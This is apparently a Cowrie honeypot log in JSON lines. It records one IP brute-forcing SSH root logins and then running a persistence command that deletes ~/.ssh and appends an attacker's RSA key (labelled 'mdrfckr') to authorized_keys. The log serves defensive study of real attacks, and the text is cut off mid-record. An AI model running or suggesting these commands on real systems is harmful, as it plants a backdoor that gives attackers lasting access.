{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T06:25:03.886153Z","src_ip":"212.227.235.229","session":"4a37ad2168cc"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T06:25:04.043276Z","src_ip":"212.227.235.229","session":"4a37ad2168cc"}
{"eventid":"cowrie.login.success","username":"root","password":"Admin987","message":"login attempt [root/Admin987] succeeded","sensor":"my-vps","timestamp":"2025-08-26T06:25:04.670050Z","src_ip":"212.227.235.229","session":"4a37ad2168cc"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T06:25:05.067730Z","src_ip":"212.227.235.229","session":"4a37ad2168cc"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T06:25:05.068764Z","src_ip":"212.227.235.229","session":"4a37ad2168cc"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T06:25:05.070529Z","src_ip":"212.227.235.229","session":"4a37ad2168cc"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:25:05.227738Z","src_ip":"212.227.235.229","session":"4a37ad2168cc"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T06:25:05.610125Z","src_ip":"212.227.235.229","session":"4a37ad2168cc"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T06:25:05.610875Z","src_ip":"212.227.235.229","session":"4a37ad2168cc"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T06:25:05.770314Z","src_ip":"212.227.235.229","session":"4a37ad2168cc"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:25:05.771470Z","src_ip":"212.227.235.229","session":"4a37ad2168cc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49078,"dst_ip":"1.2.3.4","dst_port":22,"session":"6cc8e21ff4ca","protocol":"ssh","message":"New connection: 212.227.235.229:49078 (1.2.3.4:22) [session: 6cc8e21ff4ca]","sensor":"my-vps","timestamp":"2025-08-26T06:25:05.944205Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T06:25:05.945084Z","src_ip":"212.227.235.229","session":"6cc8e21ff4ca"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T06:25:06.106498Z","src_ip":"212.227.235.229","session":"6cc8e21ff4ca"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T06:25:06.794103Z","src_ip":"212.227.235.229","session":"6cc8e21ff4ca"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:25:07.959161Z","src_ip":"212.227.235.229","session":"6cc8e21ff4ca"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49626,"dst_ip":"1.2.3.4","dst_port":22,"session":"250b6c08a18e","protocol":"ssh","message":"New connection: 212.227.235.229:49626 (1.2.3.4:22) [session: 250b6c08a18e]","sensor":"my-vps","timestamp":"2025-08-26T06:25:08.112321Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T06:25:08.113285Z","src_ip":"212.227.235.229","session":"250b6c08a18e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T06:25:08.268310Z","src_ip":"212.227.235.229","session":"250b6c08a18e"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T06:25:08.936141Z","src_ip":"212.227.235.229","session":"250b6c08a18e"}
{"eventid":"cowrie.session.closed","duration":"1.0","message":"Connection lost after 1.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:25:09.094133Z","src_ip":"212.227.235.229","session":"250b6c08a18e"}
{"eventid":"cowrie.session.closed","duration":"5.2","message":"Connection lost after 5.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:25:09.095877Z","src_ip":"212.227.235.229","session":"4a37ad2168cc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39254,"dst_ip":"1.2.3.4","dst_port":22,"session":"1a84ff85550c","protocol":"ssh","message":"New connection: 212.227.235.229:39254 (1.2.3.4:22) [session: 1a84ff85550c]","sensor":"my-vps","timestamp":"2025-08-26T06:25:36.924916Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T06:25:36.925975Z","src_ip":"212.227.235.229","session":"1a84ff85550c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T06:25:37.197457Z","src_ip":"212.227.235.229","session":"1a84ff85550c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38002,"dst_ip":"1.2.3.4","dst_port":22,"session":"0f3541fe3c3f","protocol":"ssh","message":"New connection: 212.227.235.229:38002 (1.2.3.4:22) [session: 0f3541fe3c3f]","sensor":"my-vps","timestamp":"2025-08-26T06:25:37.874587Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T06:25:37.875716Z","src_ip":"212.227.235.229","session":"0f3541fe3c3f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T06:25:38.145070Z","src_ip":"212.227.235.229","session":"0f3541fe3c3f"}
{"eventid":"cowrie.login.success","username":"root","password":"123456*a","message":"login attempt [root/123456*a] succeeded","sensor":"my-vps","timestamp":"2025-08-26T06:25:39.078335Z","src_ip":"212.227.235.229","session":"1a84ff85550c"}
{"eventid":"cowrie.login.success","username":"root","password":"Gb123456@","message":"login attempt [root/Gb123456@] succeeded","sensor":"my-vps","timestamp":"2025-08-26T06:25:39.263646Z","src_ip":"212.227.235.229","session":"0f3541fe3c3f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T06:25:39.646691Z","src_ip":"212.227.235.229","session":"1a84ff85550c"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T06:25:39.647490Z","src_ip":"212.227.235.229","session":"1a84ff85550c"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T06:25:39.648665Z","src_ip":"212.227.235.229","session":"1a84ff85550c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T06:25:39.888296Z","src_ip":"212.227.235.229","session":"0f3541fe3c3f"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T06:25:39.889139Z","src_ip":"212.227.235.229","session":"0f3541fe3c3f"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T06:25:39.890432Z","src_ip":"212.227.235.229","session":"0f3541fe3c3f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:25:39.922029Z","src_ip":"212.227.235.229","session":"1a84ff85550c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:25:40.161449Z","src_ip":"212.227.235.229","session":"0f3541fe3c3f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T06:25:40.529974Z","src_ip":"212.227.235.229","session":"1a84ff85550c"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T06:25:40.530975Z","src_ip":"212.227.235.229","session":"1a84ff85550c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T06:25:40.778524Z","src_ip":"212.227.235.229","session":"0f3541fe3c3f"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T06:25:40.779500Z","src_ip":"212.227.235.229","session":"0f3541fe3c3f"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T06:25:40.805767Z","src_ip":"212.227.235.229","session":"1a84ff85550c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:25:40.806755Z","src_ip":"212.227.235.229","session":"1a84ff85550c"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T06:25:41.051110Z","src_ip":"212.227.235.229","session":"0f3541fe3c3f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:25:41.052116Z","src_ip":"212.227.235.229","session":"0f3541fe3c3f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40158,"dst_ip":"1.2.3.4","dst_port":22,"session":"919d5f224861","protocol":"ssh","message":"New connection: 212.227.235.229:40158 (1.2.3.4:22) [session: 919d5f224861]","sensor":"my-vps","timestamp":"2025-08-26T06:25:41.064887Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T06:25:41.065977Z","src_ip":"212.227.235.229","session":"919d5f224861"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38010,"dst_ip":"1.2.3.4","dst_port":22,"session":"9057363e2dfa","protocol":"ssh","message":"New connection: 212.227.235.229:38010 (1.2.3.4:22) [session: 9057363e2dfa]","sensor":"my-vps","timestamp":"2025-08-26T06:25:41.304308Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T06:25:41.305285Z","src_ip":"212.227.235.229","session":"9057363e2dfa"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.